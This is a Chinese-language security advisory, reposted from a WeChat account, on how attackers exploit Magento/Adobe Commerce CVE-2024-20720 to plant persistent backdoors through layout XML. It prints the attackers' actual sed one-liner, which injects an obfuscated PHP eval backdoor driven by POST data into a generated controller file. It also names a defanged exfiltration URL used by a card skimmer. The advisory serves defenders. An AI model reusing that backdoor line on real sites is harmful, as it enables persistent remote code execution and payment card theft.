Magento漏洞被利用以部署隐藏在XML中的持久后门

admin 2024年4月20日00:02:23评论7 views字数 1247阅读4分9秒阅读模式

漏洞概述

漏洞名称

Adobe Commerce 操作系统命令注入漏洞

漏洞编号

QVD-2024-6631,CVE-2024-20720

公开时间

2024-02-15

影响量级

万级

奇安信评级

高危

CVSS 3.1分数

9.1

威胁类型

命令注入

利用可能性

危害描述:Adobe Commerce受到到操作系统命令中使用的特殊元素不当中和(“操作系统命令注入”)漏洞的影响,该漏洞可能导致由攻击者造成的任意代码执行。

事件详情

Sansec 研究人员观察到威胁行为者正在利用最近披露的 Magento 漏洞 CVE-2024-20720 在电子商店上部署持久后门。

CVE-2024-20720是一个操作系统命令注入漏洞,Adobe Commerce 版本 2.4.6-p3、2.4.5-p5、2.4.4-p6 及更早版本受到操作系统命令中使用的特殊元素不当中和漏洞的影响,该漏洞可能导致任意代码执行。这个漏洞非常危险,因为它的利用不需要用户交互。
Adobe 通过 2024 年 2 月的周二补丁安全更新解决了该问题。
Sansec 研究人员在数据库中发现了一个精心设计的布局模板,用于自动注入 XML 代码。
攻击者将以下 XML 代码注入到 layout_update 数据库表来实现系统的定期再感染。
Magento漏洞被利用以部署隐藏在XML中的持久后门
研究人员观察到攻击者将 Magento 布局解析器与 beberlei/assert 默认安装的软件包,用于执行系统命令。
“由于布局块与结账购物车相关联,每当请求 /checkout/cart 时,此命令都会被执行。在这种情况下,该命令是 sed,它向(自动生成的)CMS 控制器添加了一个后门。”
Sansec 发布的分析称:“这种做法很巧妙,因为即使手动修复或运行 bin/magento setup:di:compile 后,恶意软件也会被重新注入。”
sed -i "s/___init();/___init();if  (  isset  (   $_POST  [   "7faa27b473" ])  )   {   $catalogQuery  ="bas" .   "e64_de".   "code" ;     @  eval  (  $catalogQuery (  strrev  (  $_POST  ["7faa27b473"] )  ));exit (   0  )   ;}/g"   ../generated/code/Magento/Cms/Controller/Index/Index/Interceptor.php
所描述的过程允许攻击者通过 POST 命令建立持久的远程代码执行。研究人员报告称,攻击者利用这种机制注入了一个伪造的 Stripe 支付窃取器。捕获的数据被发送到
hxxps://halfpriceboxesusa.com/pub/health_check.php,这很可能是另一个遭到 compromise 的Magento商店。
专家们敦促基于 Magento 的电子商务网站管理员尽快升级到版本 2.4.6-p4、2.4.5-p6 或 2.4.4-p7,并扫描他们的网站以查找任何受到威胁的指标。

原文始发于微信公众号(奇安信安全监测与响应中心):Magento漏洞被利用以部署隐藏在XML中的持久后门

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月20日00:02:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Magento漏洞被利用以部署隐藏在XML中的持久后门http://cn-sec.com/archives/2637212.html

发表评论

匿名网友 填写信息